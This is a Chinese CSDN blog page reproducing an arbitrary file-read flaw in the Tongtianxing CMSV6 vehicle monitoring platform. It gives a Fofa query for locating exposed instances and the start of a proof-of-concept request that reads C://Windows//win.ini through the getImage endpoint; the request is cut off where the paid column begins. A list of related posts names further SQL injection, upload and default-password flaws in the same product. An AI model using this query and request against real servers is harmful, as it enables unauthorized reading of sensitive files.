【漏洞复现】通天星CMSV6车载监控平台getImage文件读取漏洞

最新推荐文章于 2024-07-26 14:54:31 发布
最新推荐文章于 2024-07-26 14:54:31 发布
阅读量164 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/138175717
版权
【漏洞复现】 专栏收录该内容
150 篇文章 1 订阅

已下架不支持订阅

通天星CMSV6车载定位监控平台存在getImage文件读取漏洞,允许攻击者通过特定搜索语法读取服务器文件,可能导致敏感信息泄露。该漏洞涉及车载录像机、单兵录像机等多个产品线。
摘要由CSDN通过智能技术生成

漏洞描述:

通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。

通天星CMSV6车载视频监控平台存在getImage文件读取漏洞,攻击者可以利用此漏洞读取服务器文件信息,造成敏感信息泄露等安全问题。

搜索语法:

Fofa-Query: web.body="/808gps/"

漏洞详情:

1.通天星CMSV6车载视频监控平台。

2.漏洞POC:

POST /808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100 HTTP/1.1
Hos
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
专栏目录

已下架不支持订阅

漏洞复现天星CMSV6车载监控平台Login弱口令漏洞
晚风不及你
04-25 137
天星CMSV6车载视频监控平台存在弱口令漏洞,导致攻击者过此漏洞登录系统获取敏感信息。
天星CMSV6车载视频监控平台disable接口处存在SQL注入漏洞 [附POC]
薛定谔嘚喵博客
07-23 312
天星CMSV6车载视频监控平台disable存在SQL注入漏洞,攻击者可以过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞复现
0xSec
06-24 1007
2024年5月,天星CMSV6发布新版本修复了一处SQL注入漏洞漏洞是由于天星CMSV6车载定位监控平台未对用户的输入进行预编译,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞过SQL注入实现文件写入进行远程代码执行,获取服务器权限。建议及时修复漏洞
天星CMSV6 车载视频监控平台 信息泄露漏洞
qq_69775412的博客
03-15 719
天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞
天星CMSV6车载视频监控平台 downloadLogger.action 任意文件读取漏洞复现
0xSec
04-11 564
天星CMSV6车载视频监控平台downloadLogger.action接口处任意文件读取漏洞,未经身份认证的攻击者可以过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态。
漏洞复现天星CMSV6车载监控平台getImage任意文件读取漏洞
晚风不及你
03-04 849
深圳市天星科技有限公司,是一家以从事计算机、信和其他电子设备制造业为主的企业。天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交上。
天星CMSV6车载视频监控平台 getImage 任意文件读取漏洞复现
0xSec
02-26 1349
天星CMSV6车载视频监控平台StandardReportMediaAction_getImage.action接口处任意文件读取漏洞,未经身份认证的攻击者可以过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态。
漏洞复现天星CMSV6车载监控平台vehicleTTS SQL注入漏洞
晚风不及你
04-25 207
天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS.action文件DevIDNO参数存在SQL注入漏洞,攻击者可以过此漏洞获取数据库信息。
漏洞复现天星CMSV6车载监控平台inspect_file文件上传漏洞
晚风不及你
04-25 217
天星CMSV6车载视频监控平台/inspect_file/upload存在文件上传漏洞,攻击者利用此漏洞可以获取服务器控制权限。
漏洞复现天星CMSV6车载视频监控平台 druid存在默认口令漏洞
https://blog.echo234.cn/
03-27 471
天星CMSV6车载视频监控平台是东莞市天星软件科技有限公司研发的监控平台天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。天星CMSV6车载视频监控平台 druid存在默认口令漏洞
天星CMSV6车载定位监控平台 SQL注入漏洞复现(XVE-2023-23744)
0xSec
03-15 977
漏洞是由于天星CMSV6车载定位监控平台/run_stop/delete.do;downloadLogger.action接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取获取网站绝对路径写入后门文件进行远程代码执行。
漏洞复现天星CMSV6车载视频监控平台存在文件上传漏洞
https://blog.echo234.cn/
03-27 1691
天星CMSV6车载视频监控平台是东莞市天星软件科技有限公司研发的监控平台天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。天星CMSV6车载视频监控平台存在文件上传漏洞
天星CMSV6车载视频监控平台默认口令漏洞
weixin_43567873的博客
03-28 235
天星CMSV6车载视频监控平台默认口令漏洞
漏洞复现天星CMSV6车载视频监控平台 disable存在SQL注入
weixin_54799594的博客
07-26 994
漏洞复现过程中的笔记
漏洞复现天星CMSV6车载定位监控平台 downloadLogger.action SQL注入漏洞
https://blog.echo234.cn/
03-25 559
天星CMSV6车载视频监控平台是东莞市天星软件科技有限公司研发的监控平台天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。天星CMSV6车载定位监控平台ids接口处存在SQL注入漏洞,恶意攻击者可能会利用该漏洞获取敏感信息,从而导致服务器失陷。
漏洞复现天星CMSV6车载监控平台Druid弱口令漏洞
晚风不及你
04-25 238
天星CMSV6车载视频监控平台存在Druid弱口令漏洞,导致攻击者过此漏洞登录系统获取敏感信息。
漏洞复现天星CMSV6车载监控平台ids SQL注入漏洞
晚风不及你
04-25 185
天星CMSV6车载视频监控平台/run_stop/delete.do;downloadLogger.action文件ids参数存在SQL注入漏洞,攻击者可以过此漏洞获取数据库信息。
天星CMSV6车载定位监控平台 SQL注入漏洞复现(含nuclei-poc)
m0_50797689的博客
03-18 450
天星CMSV6车载定位监控平台 SQL注入漏洞复现(含nuclei-poc)
天星CMSV6车载视频监控平台 disable存在SQL注入漏洞
最新发布
weixin_59047731的博客
07-26 173
鹰图语法fofa语法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值